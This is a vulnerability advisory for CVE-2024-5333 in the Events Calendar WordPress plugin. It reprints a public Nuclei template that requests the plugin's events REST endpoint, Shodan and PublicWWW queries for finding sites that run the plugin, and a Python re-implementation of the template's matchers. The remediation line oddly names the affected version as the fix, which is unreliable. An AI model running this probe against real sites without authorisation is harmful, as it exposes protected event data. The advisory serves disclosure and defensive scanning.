CVE-2024-5333: WordPress Events Calendar 6.8.2.1 - Information Disclosure

Date: 2026-02-03 | Affected software: unknown | PoC: public

Vulnerability description

The Events Calendar WordPress plugin 6.8.2.1 is missing access checks in its REST API, letting unauthenticated users access information about password-protected events; exploitation requires no authentication.

PoC code [public]

id: CVE-2024-5333

info:
  name: WordPress Events Calendar 6.8.2.1 - Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    The Events Calendar WordPress plugin 6.8.2.1 is missing access checks in its REST API, letting unauthenticated users access information about password-protected events; exploitation requires no authentication.
  impact: |
    Unauthenticated users can access sensitive event information, potentially leading to information disclosure.
  remediation: |
    Update to version 6.8.2.1 or later.
  reference:
    - https://wpscan.com/vulnerability/764b5a23-8b51-4882-b899-beb54f684984/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5333
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5333
    cwe-id: CWE-639
    epss-score: 0.07699
    epss-percentile: 0.91736
  metadata:
    verified: true
    max-request: 1
    vendor: stellarwp
    product: the_events_calendar
    framework: wordpress
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
    shodan-query: html:"/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,the-events-calendar,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/events/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"events":'
          - '"rest_url":'
          - '"total":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206135b9e3638349833e678db095ed12b5078464ba8dbef86b8dc4c23ee8d14a6d022100d4078e71e94765bef36f76a49e5d134d0cf8796d7fc5fe3b72381ec70ce52fe4:922c64590222798bb761d5b6d8e72950
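As an added example (not part of the original advisory or of the Nuclei project), the matcher logic of the template above carried out in Python against constructed HTTP responses, so a defender can see exactly what the template treats as a hit. The `Response` class, `eval_matcher` and `template_matches` are assumed names; the sample bodies are constructed.

```python
"""Evaluate the CVE-2024-5333 Nuclei template's matchers on sample responses."""
from dataclasses import dataclass

# The three matchers transcribed from the template; combined with matchers-condition: and
MATCHERS = [
    {"type": "word", "part": "body",
     "words": ['"events":', '"rest_url":', '"total":'], "condition": "and"},
    {"type": "word", "part": "content_type", "words": ["application/json"]},
    {"type": "status", "status": [200]},
]


@dataclass
class Response:
    status: int
    content_type: str
    body: str


def eval_matcher(matcher: dict, resp: Response) -> bool:
    """Evaluate one Nuclei matcher (word or status) against a response."""
    if matcher["type"] == "status":
        return resp.status in matcher["status"]
    if matcher["type"] == "word":
        haystack = resp.body if matcher["part"] == "body" else resp.content_type
        hits = [w in haystack for w in matcher["words"]]  # substring match, like Nuclei
        # a word matcher without an explicit condition defaults to "or"
        return all(hits) if matcher.get("condition", "or") == "and" else any(hits)
    raise ValueError(f"unsupported matcher type: {matcher['type']}")


def template_matches(resp: Response, matchers=MATCHERS, matchers_condition="and") -> bool:
    """Combine all matcher results the way matchers-condition does."""
    results = [eval_matcher(m, resp) for m in matchers]
    return all(results) if matchers_condition == "and" else any(results)


# Constructed sample responses (not captured from a real site)
EXPOSED = Response(200, "application/json; charset=UTF-8",
                   '{"events":[{"id":1,"title":"Board meeting"}],'
                   '"rest_url":"https://example.test/wp-json/tribe/events/v1/events/","total":1}')
DENIED = Response(401, "application/json; charset=UTF-8",
                  '{"code":"rest_forbidden","message":"Sorry, you are not allowed to do that."}')
# An HTML page mentioning the same keys must not trigger: content_type matcher fails
HTML_PAGE = Response(200, "text/html; charset=UTF-8",
                     '<p>Keys: "events": "rest_url": "total":</p>')
```

A match only shows that the public events listing is reachable with the expected JSON shape; whether password-protected event details are actually included must be confirmed against the plugin version and the returned event objects.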